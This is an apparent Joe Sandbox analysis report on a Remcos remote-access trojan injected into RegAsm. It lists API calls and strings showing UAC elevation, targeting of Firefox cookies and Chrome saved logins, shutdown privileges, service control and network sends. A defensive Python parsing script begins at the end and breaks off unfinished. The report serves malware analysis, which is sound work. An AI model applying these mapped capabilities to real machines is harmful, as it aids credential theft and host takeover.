• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
• CloseHandle.KERNEL32(00000000), ref: 0040F59E
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• CloseHandle.KERNEL32(00000000), ref: 0040F6A9
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
• API String ID: 3756808967-1743721670
• Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
• Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
• Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
• Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7$VG
• API String ID: 0-1861860590
• Opcode ID: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
• Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
• Opcode Fuzzy Hash: 2b7f1c5f9e74514b744c6683ac33cf56b6b25cbe789a3e3722b220038b1ce3bf
• Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
• IsValidCodePage.KERNEL32(00000000), ref: 004527F7
• IsValidLocale.KERNEL32(?,00000001), ref: 00452806
• GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
• GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID: JD$JD$JD$t'`/
• API String ID: 745075371-903519349
• Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
• Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
• Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
• Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
APIs
• _wcslen.LIBCMT ref: 0040755C
• CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Object_wcslen
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• API String ID: 240030777-3166923314
• Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
• Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
• Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
• Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
• GetLastError.KERNEL32 ref: 0041A84C
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
• API String ID: 3587775597-0
• Opcode ID: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
• Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
• Opcode Fuzzy Hash: 43b67a718bb517ffd93a938c9ebe81ee5828789c1c870c485cfbeb08b180e584
• Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
APIs
• _free.LIBCMT ref: 00449292
• _free.LIBCMT ref: 004492B6
• _free.LIBCMT ref: 0044943D
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
• WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
• WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
• _free.LIBCMT ref: 00449609
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID: t'`/
• API String ID: 314583886-2084328917
• Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
• Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
• Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
• Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
APIs
• FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
• FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
• FindClose.KERNEL32(00000000), ref: 0040C4B8
• FindClose.KERNEL32(00000000), ref: 0040C4E3
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                  • API String ID: 1164774033-405221262
                                                                                                                                                                                                  • Opcode ID: fddf014dc9d51464ede12c116fb1a9a1db5591685b143fb650fb6654b978e18b
                                                                                                                                                                                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fddf014dc9d51464ede12c116fb1a9a1db5591685b143fb650fb6654b978e18b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C41F
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C42C
                                                                                                                                                                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C44D
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C473
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2341273852-0
                                                                                                                                                                                                  • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                                                                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                                                                                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Find$CreateFirstNext
                                                                                                                                                                                                  • String ID: 8SG$PXG$PXG$NG$PG
                                                                                                                                                                                                  • API String ID: 341183262-3812160132
                                                                                                                                                                                                  • Opcode ID: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                                                                                                                                                                  • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1888522110-0
                                                                                                                                                                                                  • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                                                                                  • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$t'`/
                                                                                                                                                                                                  • API String ID: 4168288129-2107481299
                                                                                                                                                                                                  • Opcode ID: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                                                                                                                                                                                  • Instruction ID: 22fd31c6184e07a9d3e8c26eafc68e38345e899adb4ac4f90a3aea4af7cb717d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e29b251e1eee29052bf5b6da388e4b2e308b35626dbf2dd5d7aa75add96dd8b0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBC27E71D046288FDB25CE28DD407EAB3B5EB8530AF1541EBD80DE7241E778AE898F45
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                                                  • API String ID: 2127411465-314212984
                                                                                                                                                                                                  • Opcode ID: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                                                                                                                                                                  • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
APIs
  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
• ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
• LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
• GetProcAddress.KERNEL32(00000000), ref: 004168AD
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
• String ID: !D@$PowrProf.dll$SetSuspendState
• API String ID: 1589313981-2876530381
• Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
• Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
• Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
• Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
• GetLastError.KERNEL32 ref: 0040BA93
Strings
• [Chrome StoredLogins not found], xrefs: 0040BAAD
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
• UserProfile, xrefs: 0040BA59
• [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
• API String ID: 2018770650-1062637481
• Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
• Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
• Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
• Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
• OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
• GetLastError.KERNEL32 ref: 004179D8
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3534403312-3733053543
• Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
• Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
• Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
• Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
APIs
• __EH_prolog.LIBCMT ref: 00409293
  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,021C4988,00000010), ref: 004048E0
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
• FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
• FindClose.KERNEL32(00000000), ref: 004093FC
  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
• FindClose.KERNEL32(00000000), ref: 004095F4
  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
• String ID:
• API String ID: 1824512719-0
• Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
• Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
• Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
• Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
• CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
• CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
• CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ManagerStart
• String ID:
• API String ID: 276877138-0
• Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
• Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
• Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
• Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
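The function blocks above document three host-control capabilities in the Remcos image injected into RegAsm (process 13, image base 0x400000): a routine that enables SeShutdownPrivilege through LookupPrivilegeValueA/AdjustTokenPrivileges and then calls ExitWindowsEx and resolves SetSuspendState from PowrProf.dll (shutdown, reboot or suspend on operator command); a routine that deletes Chrome's Login Data file and logs "[Chrome StoredLogins found, cleared!]" (a wipe, not a read: it removes saved passwords, so the user has to retype them, which matters given the keyboard hook flagged in the signature list); and a routine that opens the service control manager and starts an existing service. When reviewing a report of this length it helps to parse the blocks rather than scroll them. The following script is an added example, not Joe Sandbox code: it parses the "APIs", "Strings" and "Similarity" bullets of each block and flags API-plus-string combinations. The sample input is a condensed copy of the three blocks above; the rule names (power_control, browser_login_data_wipe, service_start) are labels chosen here, not Joe Sandbox signature names.

```python
"""Triage helper for the per-function listing of a Joe Sandbox report.

Added example; not part of the report and not Joe Sandbox tooling. It
parses the "APIs" / "Strings" / "Similarity" bullets of every function
block and flags combinations of API calls and strings that matter for
triage. Rule names below are this example's own labels.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: a condensed copy of three function blocks from the
# report (shutdown/suspend routine, Chrome Login Data wipe, service
# start). Bullets that no rule needs were left out.
SAMPLE_REPORT = r"""
APIs
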